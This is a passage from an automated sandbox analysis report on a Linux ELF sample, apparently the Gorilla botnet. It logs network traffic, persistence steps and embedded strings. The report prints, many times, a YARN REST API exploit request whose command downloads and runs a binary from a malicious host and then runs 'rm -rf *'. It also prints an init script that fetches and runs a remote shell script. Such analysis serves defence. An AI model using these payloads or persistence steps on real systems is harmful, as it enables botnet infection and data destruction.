79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 140.203.230.141:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 140.203.230.141:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 254.30.40.98:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 32.181.180.75:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 32.181.180.75:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 32.181.180.75:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: /tmp/tVdq8lEt3e.elf (PID: 6221)Socket: 0.0.0.0:38241Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 45.202.35.64
                Source: unknownTCP traffic detected without corresponding DNS query: 45.202.35.64
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 76.204.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 45.202.35.64
                Source: unknownTCP traffic detected without corresponding DNS query: 76.204.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 133.194.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 133.194.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 45.202.35.64
                Source: unknownTCP traffic detected without corresponding DNS query: 133.194.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 133.194.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 133.194.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 94.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 133.194.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 94.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 106.99.156.126
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.220
                Source: unknownTCP traffic detected without corresponding DNS query: 106.99.156.126
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.220
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.220
                Source: unknownTCP traffic detected without corresponding DNS query: 89.237.185.118
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.220
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.220
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.220
                Source: unknownTCP traffic detected without corresponding DNS query: 89.237.185.118
                Source: unknownTCP traffic detected without corresponding DNS query: 91.92.246.113
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.92.246.113
                Source: unknownTCP traffic detected without corresponding DNS query: 78.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 78.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 91.92.246.113
                Source: unknownTCP traffic detected without corresponding DNS query: 78.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 78.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 222.102.85.235
                Source: unknownTCP traffic detected without corresponding DNS query: 78.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 78.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 78.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 222.102.85.235
                Source: unknownTCP traffic detected without corresponding DNS query: 78.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 91.92.246.113
                Source: unknownTCP traffic detected without corresponding DNS query: 200.141.63.82
                Source: unknownTCP traffic detected without corresponding DNS query: 78.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 200.141.63.82
                Source: unknownTCP traffic detected without corresponding DNS query: 78.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 78.220.79.118
                Source: unknownTCP traffic detected without corresponding DNS query: 93.123.85.166
                Source: unknownTCP traffic detected without corresponding DNS query: 27.174.203.118
                Source: unknownHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 133.194.79.118:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: profile.12.dr, inittab.12.dr, tVdq8lEt3e.elf.31.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.drString found in binary or memory: http://pen.gorillafirewall.su/
                Source: tVdq8lEt3e.elfString found in binary or memory: http://pen.gorillafirewall.su/x86_32.nn;
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

                System Summary

                barindex
                Contains symbols with names commonly found in malware
                Source: ELF static info symbol of initial sampleName: attack.c
                Source: ELF static info symbol of initial sampleName: attack_get_opt_int
                Source: ELF static info symbol of initial sampleName: attack_get_opt_ip
                Source: ELF static info symbol of initial sampleName: attack_gre.c
                Source: ELF static info symbol of initial sampleName: attack_gre_eth
                Source: ELF static info symbol of initial sampleName: attack_gre_ip
                Source: ELF static info symbol of initial sampleName: attack_init
                Source: ELF static info symbol of initial sampleName: attack_parse
                Source: ELF static info symbol of initial sampleName: attack_start
                Source: ELF static info symbol of initial sampleName: attack_std
                Source: tVdq8lEt3e.elfELF static info symbol of initial sample: __gnu_unwind_execute
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: busybox
                Source: Initial sampleString containing 'busybox' found: /usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencodersystem/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/487154914:1553<41<515791446<614561;814994;8153;148;14<5Attempting to bind on address %d.%d.%d.%d
                Source: Initial sampleString containing 'busybox' found: wgetcurlping/pswiresharktcpdumpnetstatpythonbusyboxiptablesnanonvimvimgdbpkillkillallapt/dev/watchdog/dev/misc/watchdoggorilla botnet is on the device ur not a cat go away/var/igorillaThe Gorilla Botnet Cats Came After You!kwws=22shq1jruloodiluhzdoo1vx2oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt
                Source: /tmp/tVdq8lEt3e.elf (PID: 6269)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6269)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6269)SIGKILL sent: pid: 1664, result: successfulJump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6269)SIGKILL sent: pid: 2096, result: successfulJump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6269)SIGKILL sent: pid: 2102, result: successfulJump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6269)SIGKILL sent: pid: 6231, result: successfulJump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6269)SIGKILL sent: pid: 6272, result: successfulJump to behavior
                Source: classification engineClassification label: mal100.spre.troj.evad.linELF@0/11@0/0

                Persistence and Installation Behavior

                barindex
                Sample tries to persist itself using /etc/profile
                Source: /tmp/tVdq8lEt3e.elf (PID: 6221)File: /etc/profileJump to behavior
                Sample tries to persist itself using System V runlevels
                Source: /tmp/tVdq8lEt3e.elf (PID: 6221)File: /etc/rc.localJump to behavior
                Source: /usr/bin/ln (PID: 6250)File: /etc/rcS.d/S99mybinary -> /etc/init.d/mybinaryJump to behavior
                Source: /usr/bin/ln (PID: 6264)File: /etc/rc.d/S99tVdq8lEt3e.elf -> /etc/init.d/tVdq8lEt3e.elfJump to behavior
                Sample tries to set files in /etc globally writable
                Source: /tmp/tVdq8lEt3e.elf (PID: 6221)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /usr/bin/chmod (PID: 6247)File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /usr/bin/chmod (PID: 6255)File: /etc/init.d/tVdq8lEt3e.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6225)Shell command executed: /bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6241)Shell command executed: /bin/sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"Jump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6248)Shell command executed: /bin/sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"Jump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6251)Shell command executed: /bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/tVdq8lEt3e.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting tVdq8lEt3e.elf'\n /tmp/tVdq8lEt3e.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping tVdq8lEt3e.elf'\n killall tVdq8lEt3e.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/tVdq8lEt3e.elf"Jump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6253)Shell command executed: /bin/sh -c "chmod +x /etc/init.d/tVdq8lEt3e.elf >/dev/null 2>&1"Jump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6256)Shell command executed: /bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6262)Shell command executed: /bin/sh -c "ln -s /etc/init.d/tVdq8lEt3e.elf /etc/rc.d/S99tVdq8lEt3e.elf >/dev/null 2>&1"Jump to behavior
                Source: /bin/sh (PID: 6247)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mybinaryJump to behavior
                Source: /bin/sh (PID: 6255)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/tVdq8lEt3e.elfJump to behavior
                Source: /bin/sh (PID: 6261)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
                Source: /bin/sh (PID: 6227)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6221)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /usr/bin/chmod (PID: 6247)File: /etc/init.d/mybinary (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /usr/bin/chmod (PID: 6255)File: /etc/init.d/tVdq8lEt3e.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/tVdq8lEt3e.elf (PID: 6221)Writes shell script file to disk with an unusual file extension: /etc/init.d/mybinaryJump to dropped file
                Source: /tmp/tVdq8lEt3e.elf (PID: 6221)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
                Source: /bin/sh (PID: 6251)Writes shell script file to disk with an unusual file extension: /etc/init.d/tVdq8lEt3e.elfJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Drops files in suspicious directories
                Source: /tmp/tVdq8lEt3e.elf (PID: 6221)File: /etc/init.d/mybinaryJump to dropped file
                Source: /bin/sh (PID: 6251)File: /etc/init.d/tVdq8lEt3e.elfJump to dropped file
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 48330 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 48330 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 45478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38258 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 45162 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 39082 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52626 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 46346 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 46346 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 50640 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 58376 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38034 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 56610 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42658 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37442 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52634 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 58836 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41508 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41508 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41508 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41508 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 46942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 46942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 46942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 35222 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 35222 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 35222 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 33516 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 33516 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 33516 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52914 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52914 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52914 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52914 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52914 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 54040 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52146 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52146 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52146 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 43392 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 43392 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 43392 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 35558 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 35558 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 54394 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 53396 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 53396 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 53396 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 53396 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 50658 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 60474 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 60474 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 60474 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 60474 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 57430 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 57430 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 57430 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 57430 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 57430 -> 8088
